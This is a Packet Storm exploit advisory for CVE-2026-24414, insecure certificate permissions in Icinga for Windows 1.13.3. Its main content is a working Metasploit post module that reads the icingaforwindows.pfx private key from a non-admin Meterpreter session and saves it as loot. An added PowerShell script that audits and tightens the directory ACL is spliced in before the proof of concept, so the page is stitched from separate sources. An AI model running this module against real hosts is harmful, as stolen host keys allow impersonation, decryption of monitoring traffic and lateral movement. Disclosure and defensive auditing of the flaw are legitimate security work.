📄 Icinga for Windows 1.13.3 Private Key Disclosure

Published 25 Feb 2026 00:00:00. Reported by indoushka. Type: packetstorm. Source: packetstorm.news. 78 views.

Metasploit exploit uses insecure ACLs in Icinga for Windows prior to 1.13.4 to access the private key in icingaforwindows.pfx.

Related entries (family, title, published, source):

    ATTACKERKB             CVE-2026-24414                                                               29 Jan 2026 17:35   attackerkb
    Circl                  CVE-2026-24414                                                               29 Jan 2026 21:01   circl
    CNNVD                  Icinga PowerShell Framework security vulnerabilities                         29 Jan 2026 00:00   cnnvd
    CVE                    CVE-2026-24414                                                               29 Jan 2026 17:35   cve
    Cvelist                CVE-2026-24414 Icinga for Windows certificate can have too-open permissions  29 Jan 2026 17:35   cvelist
    EUVD                   EUVD-2026-4963                                                               29 Jan 2026 17:35   euvd
    NVD                    CVE-2026-24414                                                               29 Jan 2026 18:16   nvd
    OSV                    CVE-2026-24414 Icinga for Windows certificate can have too-open permissions  29 Jan 2026 17:35   osv
    Packet Storm           Icinga for Windows 1.13.3 Private Key Exposure                               23 Feb 2026 00:00   packetstorm
    Positive Technologies  PT-2026-5318                                                                 29 Jan 2026 00:00   ptsecurity
=============================================================================================================================================
    | # Title     : Icinga for Windows 1.13.3 PowerShell Framework – Insecure Default Certificate Permissions Leads to Private Key Disclosure   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3                                                  |
    =============================================================================================================================================
    
    [+] Summary    : This module identifies and exploits insecure default ACL permissions in vulnerable versions of the Icinga for Windows PowerShell Framework.
                     The certificate directory is created with overly permissive read access for the BUILTIN\Users group, allowing any local user to read the icingaforwindows.pfx file, which contains the private key.
                     Successful exploitation retrieves the PKCS#12 certificate file from a non-administrative session, confirming the improper permission configuration.
                     Exposure of the private key may allow host impersonation, decryption of monitoring traffic, and potential lateral movement within enterprise environments.
    
    The module performs:
    
      - Certificate file existence validation
      - Privilege context detection
      - Optional ACL enumeration for documentation
      - Secure loot storage of the exposed private key
    
    This issue affects versions prior to 1.13.4, 1.12.4, and 1.11.2.
    
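    The defender-side counterpart to the finding above, added here as an example and not part of the advisory or of the Icinga project: a PowerShell script that reads the ACL on the certificate directory and on icingaforwindows.pfx, reports every Allow ACE that gives a broad local group (BUILTIN\Users, Everyone, Authenticated Users, INTERACTIVE) read access, and with -Remediate breaks inheritance and leaves only SYSTEM and Administrators (plus an optional service account) with access. It assumes the default install path named in the advisory and a hypothetical -ServiceAccount parameter for the account the Icinga for Windows service runs under, if that is not SYSTEM.

```powershell
# Added example (not the advisory's or the Icinga project's code): audit and, on request,
# tighten the ACL on the Icinga for Windows certificate store. Run from an elevated shell.
# Assumptions: default install path from the advisory; -ServiceAccount names the account the
# Icinga service runs under when it is not SYSTEM (it keeps Read, nothing more).
[CmdletBinding()]
param(
    [string]$CertDir = 'C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate',
    [string]$ServiceAccount = '',
    [switch]$Remediate
)

$ErrorActionPreference = 'Stop'

# Local principals that should never be able to read a private key.
$BroadPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal read the file body: ReadData (0x1) plus the generic rights
# GENERIC_READ (0x80000000) and GENERIC_ALL (0x10000000), which show up as raw numbers in ACEs.
$ReadMask = [int64]1 -bor [int64]2147483648 -bor [int64]268435456

function Get-BroadReadAce {
    # Returns one object per Allow ACE on $Path that grants read to a broad principal.
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int64]$ace.FileSystemRights -band $ReadMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited   # inherited from Program Files, or set explicitly
        }
    }
}

function Protect-PrivateKeyPath {
    # Stops ACL inheritance on $Path, drops the explicit ACEs and grants access to
    # SYSTEM and Administrators only, plus Read for the service account if one was given.
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    # $true: protect from the parent's ACL; $false: do not copy the inherited ACEs over.
    $acl.SetAccessRuleProtection($true, $false)
    foreach ($ace in @($acl.Access | Where-Object { -not $_.IsInherited })) {
        $null = $acl.RemoveAccessRule($ace)
    }
    $isDir = Test-Path -LiteralPath $Path -PathType Container
    $inherit = if ($isDir) { 'ContainerInherit, ObjectInherit' } else { 'None' }
    $grants = @(
        @{ Principal = 'NT AUTHORITY\SYSTEM';   Rights = 'FullControl' },
        @{ Principal = 'BUILTIN\Administrators'; Rights = 'FullControl' }
    )
    if ($ServiceAccount) { $grants += @{ Principal = $ServiceAccount; Rights = 'Read' } }
    foreach ($g in $grants) {
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
            $g.Principal, $g.Rights, $inherit, 'None', 'Allow')
        $acl.AddAccessRule($rule)
    }
    Set-Acl -LiteralPath $Path -AclObject $acl
}

if (-not (Test-Path -LiteralPath $CertDir -PathType Container)) {
    Write-Host "Certificate directory not found: $CertDir"
    return
}
$targets = @($CertDir)
$pfx = Join-Path $CertDir 'icingaforwindows.pfx'
if (Test-Path -LiteralPath $pfx -PathType Leaf) { $targets += $pfx }

$findings = @($targets | ForEach-Object { Get-BroadReadAce -Path $_ })
if ($findings.Count -eq 0) {
    Write-Host "OK: no broad read access on $($targets -join ', ')"
    return
}
$findings | Format-Table -AutoSize
if (-not $Remediate) {
    Write-Warning 'Private key is readable by non-administrative local users; re-run with -Remediate to tighten the ACL.'
    return
}
foreach ($t in $targets) { Protect-PrivateKeyPath -Path $t }
$after = @($targets | ForEach-Object { Get-BroadReadAce -Path $_ })
if ($after.Count -eq 0) {
    Write-Host 'Remediated: only SYSTEM and Administrators (and the service account, if given) retain access.'
} else {
    Write-Warning 'Broad ACEs still present after remediation:'
    $after | Format-Table -AutoSize
}
```

    Typical use is `.\Test-IcingaCertAcl.ps1` to audit and `.\Test-IcingaCertAcl.ps1 -Remediate -ServiceAccount 'NT AUTHORITY\NetworkService'` to fix, with the service account adjusted to whatever the Icinga service actually runs as on the host. The script checks the parent directory as well as the file because the advisory's module reads the directory ACL, and a read ACE inherited from Program Files is exactly what hands BUILTIN\Users the file. Upgrading to 1.13.4, 1.12.4 or 1.11.2 remains the real fix; this only closes the exposure on hosts that cannot be upgraded immediately.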
    [+] POC   :  
    
    ##
    # This module requires Metasploit Framework
    ##
    
    class MetasploitModule < Msf::Post
      include Msf::Post::File
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Accounts
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Icinga for Windows PowerShell Framework Private Key Disclosure',
            'Description' => %q{
              This module checks and exploits insecure default permissions
              on the Icinga for Windows certificate directory which allows
              local users to read the private key (.pfx file).
            },
            'License' => MSF_LICENSE,
            'Author' => ['indoushka'],
            'Platform' => ['win'],
            'SessionTypes' => ['meterpreter'],
            'References' => [['CVE', '2026-24414']],
            'DisclosureDate' => '2026-02-23'
          )
        )
      end
    
      # Default location of the framework's certificate store; the .pfx holds the private key.
      def certificate_path
        'C:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\certificate\\icingaforwindows.pfx'
      end
    
      # Only proves the file exists; whether it is readable is established in run.
      def check
        unless session.platform =~ /win/i
          return Exploit::CheckCode::Unsupported
        end
    
        begin
          if file?(certificate_path)
            return Exploit::CheckCode::Appears
          else
            return Exploit::CheckCode::Safe
          end
        rescue
          return Exploit::CheckCode::Unknown
        end
      end
    
      def run
        unless session.platform =~ /win/i
          fail_with(Failure::NoTarget, 'Windows session required.')
        end
    
        # Privilege context: a successful read from a non-admin session is the finding.
        print_status("Running as: #{get_current_user}")
        print_status("Admin privileges: #{is_admin?}")
    
        unless file?(certificate_path)
          fail_with(Failure::NotFound, 'Certificate file not found.')
        end
    
        print_good('Target certificate found:')
        print_status(certificate_path)
    
        # Optional ACL enumeration, kept for the report; failure here is not fatal.
        begin
          acl = cmd_exec("icacls \"#{File.dirname(certificate_path)}\"")
          print_status("ACL Information:\n#{acl}")
        rescue
          print_warning('Could not retrieve ACL information.')
        end
    
        begin
          data = read_file(certificate_path)
    
          if data.nil? || data.empty?
            fail_with(Failure::UnexpectedReply, 'File read returned empty content.')
          end
    
          # Store the PKCS#12 blob in the Metasploit loot database.
          loot_path = store_loot(
            'icinga.private_key',
            'application/x-pkcs12',
            session,
            data,
            "icingaforwindows_#{Time.now.to_i}.pfx",
            'Exposed Icinga Private Key'
          )
    
          print_good('Private key successfully retrieved!')
          print_good("Stored at: #{loot_path}")
    
          unless is_admin?
            print_warning('VULNERABILITY CONFIRMED: Non-admin session accessed private key.')
          end
    
        rescue Rex::Post::Meterpreter::RequestError => e
          # Meterpreter raises RequestError when the open is refused; NoAccess is the
          # failure reason Metasploit defines for this (Failure::PermissionDenied does not exist).
          fail_with(Failure::NoAccess, "Read failed: #{e.message}")
        end
      end
    
      def get_current_user
        begin
          client.sys.config.getuid
        rescue
          'Unknown'
        end
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
